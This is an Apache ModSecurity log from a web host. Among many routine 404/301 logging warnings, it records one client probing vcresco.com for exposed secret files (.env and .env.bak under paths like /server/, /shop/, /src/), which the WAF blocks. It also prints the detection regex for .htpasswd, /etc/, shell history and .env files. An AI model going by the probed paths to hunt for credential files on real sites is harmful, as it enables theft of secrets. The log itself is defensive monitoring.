[Tue May 26 13:04:04.637322 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BzgAAAFo"]
[Tue May 26 13:04:04.642293 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BxwAAAFY"]
[Tue May 26 13:04:04.643917 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B0AAAAF0"]
[Tue May 26 13:04:04.643951 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BzAAAAHU"]
[Tue May 26 13:04:04.649442 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4ByAAAACY"]
[Tue May 26 13:04:04.649584 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BzwAAAF8"]
[Tue May 26 13:04:04.654768 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4BywAAACQ"]
[Tue May 26 13:04:04.655329 2026] [security2:error] [pid 470766:tid 470922] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B0QAAABo"]
[Tue May 26 13:04:04.661415 2026] [security2:error] [pid 470766:tid 470993] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B0gAAAGE"]
[Tue May 26 13:04:04.661802 2026] [security2:error] [pid 470766:tid 470854] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/s3/.env.bak"] [unique_id "ahVM7OjO_W1DqEcFHQ4B4QAAAFc"]
[Tue May 26 13:04:04.675483 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B1gAAAEA"]
[Tue May 26 13:04:04.686955 2026] [security2:error] [pid 470766:tid 471010] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B2wAAAHI"]
[Tue May 26 13:04:04.692347 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B4AAAAGc"]
[Tue May 26 13:04:04.768107 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B6gAAAHw"]
[Tue May 26 13:04:04.786074 2026] [security2:error] [pid 470766:tid 470957] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B8AAAAD0"]
[Tue May 26 13:04:04.786949 2026] [security2:error] [pid 470766:tid 470926] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B7wAAAB4"]
[Tue May 26 13:04:04.805480 2026] [security2:error] [pid 470766:tid 470876] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/api/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAwAAMm0"]
[Tue May 26 13:04:04.805594 2026] [security2:error] [pid 470766:tid 470799] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAgAAMiA"]
[Tue May 26 13:04:04.809892 2026] [security2:error] [pid 470766:tid 470792] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/backend/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CBgAAMhk"]
[Tue May 26 13:04:04.832400 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B_QAAAGk"]
[Tue May 26 13:04:04.837936 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B_gAAAGY"]
[Tue May 26 13:04:04.838982 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAQAAACk"]
[Tue May 26 13:04:04.844584 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B-gAAAFU"]
[Tue May 26 13:04:04.846538 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4B-wAAMgk"]
[Tue May 26 13:04:04.846706 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CBAAAMh8"]
[Tue May 26 13:04:04.851721 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CAAAAAGQ"]
[Tue May 26 13:04:04.858752 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CBwAAMhA"]
[Tue May 26 13:04:04.873934 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CCQAAMms"]
[Tue May 26 13:04:04.882112 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CCAAAMnk"]
[Tue May 26 13:04:04.947767 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CDgAAFBU"]
[Tue May 26 13:04:04.965661 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CDwAAFHg"]
[Tue May 26 13:04:04.966175 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CEAAAFBc"]
[Tue May 26 13:04:04.992263 2026] [security2:error] [pid 470766:tid 470777] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/service/.env"] [unique_id "ahVM7OjO_W1DqEcFHQ4CGwAAFAo"]
[Tue May 26 13:04:04.996524 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CGQAAAF0"]
[Tue May 26 13:04:04.998638 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CGAAAAHU"]
[Tue May 26 13:04:05.004044 2026] [security2:error] [pid 470766:tid 470808] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/services/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CHgAAFCk"]
[Tue May 26 13:04:05.007462 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CFwAAAHg"]
[Tue May 26 13:04:05.029878 2026] [security2:error] [pid 470766:tid 470781] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shared/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CJgAAFA4"]
[Tue May 26 13:04:05.030031 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7OjO_W1DqEcFHQ4CHQAAAAE"]
[Tue May 26 13:04:05.056655 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CIgAAFCU"]
[Tue May 26 13:04:05.095791 2026] [security2:error] [pid 470766:tid 470778] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shop/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4COQAAFAs"]
[Tue May 26 13:04:05.106057 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CMwAAAGw"]
[Tue May 26 13:04:05.118241 2026] [security2:error] [pid 470766:tid 470966] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CNQAAAEY"]
[Tue May 26 13:04:05.124754 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CNAAAAEo"]
[Tue May 26 13:04:05.135009 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CNgAAAEA"]
[Tue May 26 13:04:05.135594 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4COAAAACQ"]
[Tue May 26 13:04:05.150102 2026] [security2:error] [pid 470766:tid 470820] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/src/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CSAAAFDU"]
[Tue May 26 13:04:05.152816 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CQQAAAAA"]
[Tue May 26 13:04:05.157532 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CQgAAAAY"]
[Tue May 26 13:04:05.209590 2026] [security2:error] [pid 470766:tid 470985] [client 4.201.75.230:46023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xxmlrpc.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CUAAAAFk"]
[Tue May 26 13:04:05.279846 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CSgAAACM"]
[Tue May 26 13:04:05.296074 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CSQAAAC8"]
[Tue May 26 13:04:05.299127 2026] [security2:error] [pid 470766:tid 470847] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/srv/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYQAAFFA"]
[Tue May 26 13:04:05.304509 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTwAAFBE"]
[Tue May 26 13:04:05.304522 2026] [security2:error] [pid 470766:tid 470952] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTQAAADg"]
[Tue May 26 13:04:05.306374 2026] [security2:error] [pid 470766:tid 470828] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stage/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYgAAFD0"]
[Tue May 26 13:04:05.310317 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTAAAFC4"]
[Tue May 26 13:04:05.313575 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CUQAAFDM"]
[Tue May 26 13:04:05.313718 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CXQAAFDs"]
[Tue May 26 13:04:05.314597 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CUgAAFEE"]
[Tue May 26 13:04:05.317659 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CXgAAFD8"]
[Tue May 26 13:04:05.319890 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CVwAAFHY"]
[Tue May 26 13:04:05.320079 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CTgAAFEY"]
